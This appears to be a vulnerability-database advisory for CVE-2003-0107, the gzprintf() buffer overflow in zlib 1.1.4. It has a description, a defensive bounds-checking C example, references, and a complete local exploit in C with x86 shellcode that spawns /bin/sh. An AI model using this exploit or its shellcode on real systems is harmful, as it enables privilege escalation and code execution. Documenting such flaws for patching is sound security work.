Zlib compression library gzprintf() buffer overflow vulnerability

Vulnerability ID: 1107216    Vulnerability type: Boundary condition error
Published: 2003-02-23    Updated: 2007-04-06
CVE ID: CVE-2003-0107    CNNVD ID: CNNVD-200303-040
Platform: Linux    CVSS score: 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/22274
https://www.securityfocus.com/bid/6913
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200303-040
|Vulnerability details
zlib is a popular compression library used in many applications, including the well-known SSH implementation. zlib's gzprintf() function does not correctly check user-supplied data; a remote attacker can exploit this to trigger a buffer overflow and possibly execute arbitrary instructions on the system with the privileges of the application process that uses the function. gzprintf() is similar to fprintf(): if the formatted arguments passed to it exceed the number of bytes defined by Z_PRINTF_BUFSIZE (4096 by default), a buffer overflow is triggered, and carefully crafted data may lead to arbitrary instructions being executed with the privileges of the application process that uses this function.
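The fix for this class of bug is to bound the formatting step rather than trust the caller. As an added example (not zlib's own code), the following C mirrors gzprintf()'s 4096-byte internal buffer and shows the vsnprintf()-based length check a patched version needs; Z_PRINTF_BUFSIZE is the value quoted in the description, the function names are hypothetical, and the repeated-'A' inputs are constructed probes.

```c
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Size of gzprintf()'s internal formatting buffer in zlib 1.1.4 (per the advisory). */
#define Z_PRINTF_BUFSIZE 4096

/* Format into a fixed buffer the way a patched gzprintf() must: vsnprintf() instead
 * of vsprintf(), refusing output that does not fit instead of writing past the end.
 * Returns the formatted length, or 0 when rejected (too long, encoding error, empty). */
static int bounded_format(char *out, size_t outsz, const char *fmt, ...)
{
    va_list va;
    int len;
    va_start(va, fmt);
    len = vsnprintf(out, outsz, fmt, va);   /* writes at most outsz bytes, NUL-terminated */
    va_end(va);
    if (len <= 0 || (size_t)len >= outsz) {
        out[0] = '\0';                      /* would not fit: hand back nothing */
        return 0;
    }
    return len;
}

/* The call shape behind CVE-2003-0107: caller-controlled data formatted with "%s" into
 * a Z_PRINTF_BUFSIZE-byte stack buffer. Any input of 4096 bytes or more is now refused. */
int checked_gzprintf_len(const char *user_data)
{
    char buf[Z_PRINTF_BUFSIZE];
    return bounded_format(buf, sizeof buf, "%s", user_data);
}

/* Boundary probe: an input of n repeated 'A' bytes (constructed sample input). */
int checked_repeat_len(size_t n)
{
    char *s = malloc(n + 1);
    int len;
    if (s == NULL) return -1;
    memset(s, 'A', n);
    s[n] = '\0';
    len = checked_gzprintf_len(s);
    free(s);
    return len;
}

int main(void)
{
    /* 4095 bytes still fit (plus the NUL); 4096 would have overflowed the vsprintf() version */
    printf("4095 -> %d, 4096 -> %d\n", checked_repeat_len(4095), checked_repeat_len(4096));
    return 0;
}
```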
|Vulnerability EXP
source: http://www.securityfocus.com/bid/6913/info
 
A buffer-overrun vulnerability has been reported in the Zlib compression library. Due to the use of 'vsprintf()' by an internal Zlib function, an attacker can cause memory to become corrupted. This buffer overrun occurs because the software fails to check the boundaries of user-supplied data given to the 'gzprintf()' function.
 
Successful exploitation of this vulnerability may allow an attacker to execute arbitrary instructions.
 
Note that only Zlib 1.1.4 has been reported vulnerable to this issue. It is not yet known whether earlier versions are also affected. 

/*
 *  C local exploit for zlib <= 1.1.4
 *  just for fun..not for root :)
 *
 *  Usage: gcc -o zlib zlib.c -lz
 *
 *  by CrZ [crazy_einstein@yahoo.com] lbyte [lbyte.void.ru]
 */


#include <zlib.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>     /* exit() */
#include <string.h>     /* strcat() */
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* setuid(), setgid() */


int main(int argc, char **argv) {
        /* NOP sled followed by the PoC's payload bytes */
        char shell[]=
                "\x90\x90\x90\x90\x90\x90\x90\x90"
                "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
                "\xb0\x2e\xcd\x80\xeb\x15\x5b\x31"
                "\xc0\x88\x43\x07\x89\x5b\x08\x89"
                "\x43\x0c\x8d\x4b\x08\x31\xd2\xb0"
                "\x0b\xcd\x80\xe8\xe6\xff\xff\xff"
                "/bin/sh";
        gzFile f;
        int ret;
        unsigned long xret;
        char cret[10];
        char badbuff[10000];
        int i;

        /* address of the payload, read back as an integer (%lx fills the whole long) */
        sprintf(badbuff,"%p",shell);
        sscanf(badbuff,"0x%lx",&xret);

        printf("[>] exploiting...\n");

        if(!(f = gzopen("/dev/null", "w"))) {
                perror("/dev/null");
                exit(1);
        }

        printf("[>] xret = 0x%lx\n",xret);

        /* the four address bytes in little-endian order */
        sprintf(cret,"%c%c%c%c",(int)((xret&0xff)+4),(int)((xret>>8)&0xff),
                (int)((xret>>16)&0xff),(int)((xret>>24)&0xff));

        bzero(badbuff,sizeof(badbuff));

        /* 5000 bytes of that pattern: more than gzprintf()'s 4096-byte internal buffer */
        for(i=0;i<5000;i+=4) strcat(badbuff,cret);

        setuid(0);
        setgid(0);
        /* first argument is the gzFile opened above (a FILE* such as stderr is not a gzFile) */
        ret = gzprintf(f, "%s", badbuff );
        setuid(0);
        setgid(0);
        printf(">Sent!..\n");
        printf("gzprintf -> %d\n", ret);
        ret = gzclose(f);
        printf("gzclose -> %d [%d]\n", ret, errno);

        exit(0);
}
|Affected products
zlib zlib 1.1.4
  + Caldera OpenLinux Server 3.1.1
  + Caldera OpenLinux Server 3.1
  + Caldera OpenLinux Workstation 3.1
|References

Source: US-CERT Vulnerability Note: VU#142121
Name: VU#142121
Link: http://www.kb.cert.org/vuls/id/142121
Source: XF
Name: zlib-gzprintf-bo (11381)
Link: http://www.iss.net/security_center/static/11381.php
Source: BUGTRAQ
Name: 20030222 buffer overrun in zlib 1.1.4
Link: http://online.securityfocus.com/archive/1/312869
Source: BUGTRAQ
Name: 20030223 poc zlib sploit just for fun :)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=104610337726297&w=2
Source: lists.apple.com
Link: http://lists.apple.com/mhonarc/security-announce/msg00038.html
Source: BID
Name: 6913
Link: http://www.securityfocus.com/bid/6913
Source: REDHAT
Name: RHSA-2003:081
Link: http://www.redhat.com/support/errata/RHSA-2003-081.html
Source: REDHAT
Name: RHSA-2003:079
Link: http://www.redhat.com/support/errata/RHSA-2003-079.html
Source: OSVDB
Name: 6599
Link: http://www.osvdb.org/6599
Source: MANDRAKE
Name: MDKSA-2003:033
Link: http://www.mandrakesoft.com/security/advisories?name=MDKSA-2003:033
Source: SUNALERT
Name: 57405
Link: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doc=fsalert%2F57405
Source: GENTOO
Name: GLSA-200303-25
Link: http://marc.theaimsgroup.com